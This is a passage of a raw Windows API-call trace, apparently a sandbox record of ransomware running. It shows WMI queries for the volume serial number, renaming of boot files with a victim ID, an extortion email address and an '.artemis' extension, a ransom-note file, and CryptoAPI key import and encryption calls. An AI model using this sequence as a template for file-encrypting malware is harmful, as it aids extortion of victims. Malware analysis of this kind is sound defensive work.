Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f45c | out: ppvObject=0x689f45c*=0x0) returned 0x80004002 [0148.370] IUnknown:Release (This=0x72015c) returned 0x1 [0148.370] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f080 | out: ppv=0x689f080*=0x673ecd8) returned 0x0 [0148.370] WbemLocator:IUnknown:QueryInterface (in: This=0x673ecd8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f298 | out: ppvObject=0x689f298*=0x0) returned 0x80004002 [0148.370] WbemLocator:IClassFactory:CreateInstance (in: This=0x673ecd8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f2ac | out: ppvObject=0x689f2ac*=0x6736ea8) returned 0x0 [0148.371] WbemLocator:IUnknown:Release (This=0x673ecd8) returned 0x0 [0148.371] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ea8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eecc | out: ppvObject=0x689eecc*=0x6736ea8) returned 0x0 [0148.371] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ea8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ee88 | out: ppvObject=0x689ee88*=0x0) returned 0x80004002 [0148.371] WbemLocator:IUnknown:AddRef (This=0x6736ea8) returned 0x3 [0148.371] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ea8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e7e4 | out: ppvObject=0x689e7e4*=0x0) returned 0x80004002 [0148.371] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ea8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e794 | out: ppvObject=0x689e794*=0x0) returned 0x80004002 [0148.371] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ea8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e7a0 | out: ppvObject=0x689e7a0*=0x0) returned 0x80004002 [0148.371] CoGetContextToken (in: pToken=0x689e800 | out: pToken=0x689e800) returned 0x0 [0148.371] CoGetContextToken (in: pToken=0x689ec08 | out: pToken=0x689ec08) returned 0x0 [0148.371] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ea8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec98 | out: ppvObject=0x689ec98*=0x0) returned 0x80004002 [0148.371] WbemLocator:IUnknown:Release (This=0x6736ea8) returned 0x2 [0148.371] WbemLocator:IUnknown:Release (This=0x6736ea8) returned 0x1 [0148.371] CoGetContextToken (in: pToken=0x689f278 | out: pToken=0x689f278) returned 0x0 [0148.371] CoGetContextToken (in: pToken=0x689f1d8 | out: pToken=0x689f1d8) returned 0x0 [0148.371] WbemLocator:IUnknown:QueryInterface (in: This=0x6736ea8, riid=0x689f2a8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x689f2a4 | out: ppvObject=0x689f2a4*=0x6736ea8) returned 0x0 [0148.372] WbemLocator:IUnknown:AddRef (This=0x6736ea8) returned 0x3 [0148.372] WbemLocator:IUnknown:Release (This=0x6736ea8) returned 0x2 [0148.372] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737f90, puCount=0x689f43c | out: puCount=0x689f43c*=0x2) returned 0x0 [0148.372] WbemDefPath:IWbemPath:GetText (in: This=0x6737f90, lFlags=8, puBuffLength=0x689f438*=0x0, pszText=0x0 | out: puBuffLength=0x689f438*=0xf, pszText=0x0) returned 0x0 [0148.372] WbemDefPath:IWbemPath:GetText (in: This=0x6737f90, lFlags=8, puBuffLength=0x689f438*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f438*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.372] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x689f314 | out: ppv=0x689f314*=0x6737038) returned 0x0 [0148.372] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737038, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x689f3a8 | out: ppNamespace=0x689f3a8*=0x6742ec4) returned 0x0 [0151.760] WbemLocator:IUnknown:QueryInterface (in: This=0x6742ec4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f244 | out: ppvObject=0x689f244*=0x781814) returned 0x0 [0151.760] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781814, pProxy=0x6742ec4, pAuthnSvc=0x689f294, pAuthzSvc=0x689f290, pServerPrincName=0x689f288, pAuthnLevel=0x689f28c, pImpLevel=0x689f27c, pAuthInfo=0x689f280, pCapabilites=0x689f284 | out: pAuthnSvc=0x689f294*=0xa, pAuthzSvc=0x689f290*=0x0, pServerPrincName=0x689f288, pAuthnLevel=0x689f28c*=0x6, pImpLevel=0x689f27c*=0x2, pAuthInfo=0x689f280, pCapabilites=0x689f284*=0x1) returned 0x0 [0151.761] WbemLocator:IUnknown:Release (This=0x781814) returned 0x1 [0151.761] WbemLocator:IUnknown:QueryInterface (in: This=0x6742ec4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f238 | out: ppvObject=0x689f238*=0x781834) returned 0x0 [0151.761] WbemLocator:IUnknown:QueryInterface (in: This=0x6742ec4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f234 | out: ppvObject=0x689f234*=0x781814) returned 0x0 [0151.761] WbemLocator:IClientSecurity:SetBlanket (This=0x781814, pProxy=0x6742ec4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0151.761] WbemLocator:IUnknown:Release (This=0x781814) returned 0x2 [0151.761] WbemLocator:IUnknown:Release (This=0x781834) returned 0x1 [0151.761] CoTaskMemFree (pv=0x77e148) [0151.761] WbemLocator:IUnknown:Release (This=0x6737038) returned 0x0 [0151.761] WbemLocator:IUnknown:QueryInterface (in: This=0x6742ec4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ee34 | out: ppvObject=0x689ee34*=0x781834) returned 0x0 [0151.761] WbemLocator:IUnknown:QueryInterface (in: This=0x781834, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689edf0 | out: ppvObject=0x689edf0*=0x0) returned 0x80004002 [0151.762] WbemLocator:IUnknown:QueryInterface (in: This=0x781834, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689ec0c | out: ppvObject=0x689ec0c*=0x0) returned 0x80004002 [0152.362] WbemLocator:IUnknown:AddRef (This=0x781834) returned 0x3 [0152.362] WbemLocator:IUnknown:QueryInterface (in: This=0x781834, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e74c | out: ppvObject=0x689e74c*=0x0) returned 0x80004002 [0152.934] WbemLocator:IUnknown:QueryInterface (in: This=0x781834, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e6fc | out: ppvObject=0x689e6fc*=0x0) returned 0x80004002 [0152.938] WbemLocator:IUnknown:QueryInterface (in: This=0x781834, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e708 | out: ppvObject=0x689e708*=0x781794) returned 0x0 [0152.939] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781794, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e710 | out: pCid=0x689e710*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0152.939] WbemLocator:IUnknown:Release (This=0x781794) returned 0x3 [0152.939] CoGetContextToken (in: pToken=0x689e768 | out: pToken=0x689e768) returned 0x0 [0152.939] CoGetContextToken (in: pToken=0x689eb70 | out: pToken=0x689eb70) returned 0x0 [0152.939] WbemLocator:IUnknown:QueryInterface (in: This=0x781834, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ec00 | out: ppvObject=0x689ec00*=0x78181c) returned 0x0 [0152.939] WbemLocator:IRpcOptions:Query (in: This=0x78181c, pPrx=0x781834, dwProperty=2, pdwValue=0x689ec28 | out: pdwValue=0x689ec28) returned 0x80004002 [0152.939] WbemLocator:IUnknown:Release (This=0x78181c) returned 0x3 [0152.939] WbemLocator:IUnknown:Release (This=0x781834) returned 0x2 [0152.939] CoGetContextToken (in: pToken=0x689f148 | out: pToken=0x689f148) returned 0x0 [0152.939] CoGetContextToken (in: pToken=0x689f0a8 | out: pToken=0x689f0a8) returned 0x0 [0152.939] WbemLocator:IUnknown:QueryInterface (in: This=0x781834, riid=0x689f178*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x689f174 | out: ppvObject=0x689f174*=0x6742ec4) returned 0x0 [0152.939] WbemLocator:IUnknown:AddRef (This=0x6742ec4) returned 0x4 [0152.939] WbemLocator:IUnknown:Release (This=0x6742ec4) returned 0x3 [0152.939] WbemLocator:IUnknown:Release (This=0x6742ec4) returned 0x2 [0152.939] SysStringLen (param_1=0x0) returned 0x0 [0152.939] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738070, puCount=0x689f50c | out: puCount=0x689f50c*=0x0) returned 0x0 [0152.939] WbemDefPath:IWbemPath:GetText (in: This=0x6738070, lFlags=2, puBuffLength=0x689f508*=0x0, pszText=0x0 | out: puBuffLength=0x689f508*=0x20, pszText=0x0) returned 0x0 [0152.940] WbemDefPath:IWbemPath:GetText (in: This=0x6738070, lFlags=2, puBuffLength=0x689f508*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f508*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0152.940] CoGetContextToken (in: pToken=0x689f178 | out: pToken=0x689f178) returned 0x0 [0152.940] WbemLocator:IUnknown:AddRef (This=0x781834) returned 0x3 [0152.940] WbemLocator:IUnknown:QueryInterface (in: This=0x781834, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f00c | out: ppvObject=0x689f00c*=0x781834) returned 0x0 [0152.940] WbemLocator:IUnknown:Release (This=0x781834) returned 0x3 [0152.940] WbemLocator:IUnknown:Release (This=0x781834) returned 0x2 [0152.940] WbemDefPath:IWbemPath:GetText (in: This=0x6738070, lFlags=2, puBuffLength=0x689f510*=0x0, pszText=0x0 | out: puBuffLength=0x689f510*=0x20, pszText=0x0) returned 0x0 [0152.940] WbemDefPath:IWbemPath:GetText (in: This=0x6738070, lFlags=2, puBuffLength=0x689f510*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f510*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0152.940] IWbemServices:GetObject (in: This=0x6742ec4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x689f4c4*=0x0, ppCallResult=0x0 | out: ppObject=0x689f4c4*=0x673b798, ppCallResult=0x0) returned 0x0 [0154.652] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737f90, puCount=0x689f4c4 | out: puCount=0x689f4c4*=0x2) returned 0x0 [0154.652] WbemDefPath:IWbemPath:GetText (in: This=0x6737f90, lFlags=4, puBuffLength=0x689f4c0*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c0*=0xf, pszText=0x0) returned 0x0 [0154.653] WbemDefPath:IWbemPath:GetText (in: This=0x6737f90, lFlags=4, puBuffLength=0x689f4c0*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f4c0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0154.653] IWbemClassObject:Get (in: This=0x673b798, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f4c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x344855c*=0, plFlavor=0x3448560*=0 | out: pVal=0x689f4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x344855c*=8, plFlavor=0x3448560*=0) returned 0x0 [0154.653] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.653] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.653] IWbemClassObject:Get (in: This=0x673b798, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f4c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x344855c*=8, plFlavor=0x3448560*=0 | out: pVal=0x689f4c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x344855c*=8, plFlavor=0x3448560*=0) returned 0x0 [0154.653] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.653] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.653] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG1", nBufferLength=0x105, lpBuffer=0x689f0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG1", lpFilePart=0x0) returned 0x10 [0154.653] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG1.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x689f0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG1.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x3b [0154.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f528) returned 1 [0154.653] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), fInfoLevelId=0x0, lpFileInformation=0x689f5a4 | out: lpFileInformation=0x689f5a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0154.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f524) returned 1 [0154.653] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), lpNewFileName="C:\\Boot\\BCD.LOG1.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\boot\\bcd.log1.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0154.654] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG2", nBufferLength=0x105, lpBuffer=0x689f16c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG2", lpFilePart=0x0) returned 0x10 [0154.654] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG2", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG2", lpFilePart=0x0) returned 0x10 [0154.654] GetFullPathNameW (in: lpFileName="C:\\Boot\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689f16c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\info-decrypt.hta", lpFilePart=0x0) returned 0x18 [0154.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f5cc) returned 1 [0154.654] GetFileAttributesExW (in: lpFileName="C:\\Boot\\info-decrypt.hta" (normalized: "c:\\boot\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x689f648 | out: lpFileInformation=0x689f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1f09e0, ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xfe1f09e0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xfe1f09e0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0154.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f5c8) returned 1 [0154.655] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG2", nBufferLength=0x105, lpBuffer=0x689f0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG2", lpFilePart=0x0) returned 0x10 [0154.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f594) returned 1 [0154.655] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), fInfoLevelId=0x0, lpFileInformation=0x3448924 | out: lpFileInformation=0x3448924*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0154.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f590) returned 1 [0154.655] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG2", nBufferLength=0x105, lpBuffer=0x689efd4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG2", lpFilePart=0x0) returned 0x10 [0154.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4c8) returned 1 [0154.655] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x460 [0154.655] GetFileType (hFile=0x460) returned 0x1 [0154.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4c4) returned 1 [0154.655] GetFileType (hFile=0x460) returned 0x1 [0154.655] GetFileSize (in: hFile=0x460, lpFileSizeHigh=0x689f5d0 | out: lpFileSizeHigh=0x689f5d0*=0x0) returned 0x0 [0154.655] CloseHandle (hObject=0x460) returned 1 [0154.656] CryptAcquireContextW (in: phProv=0x689f51c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x689f51c*=0x7a8650) returned 1 [0154.657] CryptGenRandom (in: hProv=0x7a8650, dwLen=0x10, pbBuffer=0x3448da8 | out: pbBuffer=0x3448da8) returned 1 [0158.569] CryptImportKey (in: hProv=0x7a8650, pbData=0x3495fb4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x689f4ec | out: phKey=0x689f4ec*=0x77acf0) returned 1 [0158.569] CryptContextAddRef (hProv=0x7a8650, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.569] CryptContextAddRef (hProv=0x7a8650, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.569] CryptDuplicateKey (in: hKey=0x77acf0, pdwReserved=0x0, dwFlags=0x0, phKey=0x689f4dc | out: phKey=0x689f4dc*=0x77b0f0) returned 1 [0158.569] CryptContextAddRef (hProv=0x7a8650, pdwReserved=0x0, dwFlags=0x0) returned 1 [0158.569] CryptSetKeyParam (hKey=0x77b0f0, dwParam=0x4, pbData=0x3496094*=0x1, dwFlags=0x0) returned 1 [0158.569] CryptSetKeyParam (hKey=0x77b0f0, dwParam=0x1, pbData=0x3496060, dwFlags=0x0) returned 1 [0158.569] CryptEncrypt (in: hKey=0x77b0f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34960a4*, pdwDataLen=0x689f548*=0x10, dwBufLen=0x10 | out: pbData=0x34960a4*, pdwDataLen=0x689f548*=0x10) returned 1 [0158.570] CryptEncrypt (in: hKey=0x77b0f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34960d8*, pdwDataLen=0x689f550*=0x0, dwBufLen=0x10 | out: pbData=0x34960d8*, pdwDataLen=0x689f550*=0x10) returned 1 [0158.572] CryptDestroyKey (hKey=0x77acf0) returned 1 [0158.572] CryptReleaseContext (hProv=0x7a8650, dwFlags=0x0) returned 1 [0158.572] CryptReleaseContext (hProv=0x7a8650, dwFlags=0x0) returned 1 [0158.572] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG2", nBufferLength=0x105, lpBuffer=0x689efc0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG2", lpFilePart=0x0) returned 0x10 [0158.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4b4) returned 1 [0158.572] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0158.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689e2f0) returned 1 [0158.574] CoTaskMemAlloc (cb=0x20c) returned 0x7b3f80 [0158.574] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7b3f80 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0158.575] CoTaskMemFree (pv=0x7b3f80) [0158.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x689efa8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0158.575] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f4f0 | out: ppv=0x689f4f0*=0x72015c) returned 0x0 [0158.575] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f4e8 | out: pAptType=0x689f4e8*=1) returned 0x0 [0158.575] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f4ec | out: ppvObject=0x689f4ec*=0x0) returned 0x80004002 [0158.575] IUnknown:Release (This=0x72015c) returned 0x1 [0158.577] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ee58 | out: ppv=0x689ee58*=0x6736e88) returned 0x0 [0158.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e88, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f070 | out: ppvObject=0x689f070*=0x0) returned 0x80004002 [0158.577] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e88, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f084 | out: ppvObject=0x689f084*=0x67383f0) returned 0x0 [0158.577] WbemDefPath:IUnknown:Release (This=0x6736e88) returned 0x0 [0158.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eca4 | out: ppvObject=0x689eca4*=0x67383f0) returned 0x0 [0158.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x67383f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ec60 | out: ppvObject=0x689ec60*=0x0) returned 